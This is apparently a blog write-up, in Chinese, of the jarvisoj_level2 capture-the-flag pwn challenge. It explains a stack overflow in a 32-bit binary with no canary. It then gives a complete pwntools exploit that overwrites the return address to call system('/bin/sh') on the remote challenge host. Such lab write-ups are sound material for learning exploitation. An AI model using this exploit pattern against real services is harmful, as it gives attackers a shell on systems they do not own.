当前位置：网站首页>jarvisoj_level2

jarvisoj_level2

2022-06-24 06:43:00 【[mzq]】

jarvisoj_level2

在这里插入图片描述
32位没有开canary 然后程序的read函数有溢出可以执行栈溢出操作

main函数这个调用了system 函数所以plt表中是有system的地址的

在这里插入图片描述

vulnerable function 函数 read发生溢出 &buf 栈上只有0x88，然而却读入了0x100
，造成我们可以覆盖栈上ebp return address 的值.

在这里插入图片描述

exp

from pwn import *

#io = process("./level2")
io = remote("node4.buuoj.cn",27209)
elf = ELF("./level2")
context(log_level="debug",arch="i386")

system_plt = elf.plt["system"]
binsh = next(elf.search("/bin/sh"))
payload = flat(["a"*0x88,"iebp",system_plt,0,binsh])

io.sendline(payload)
io.interactive()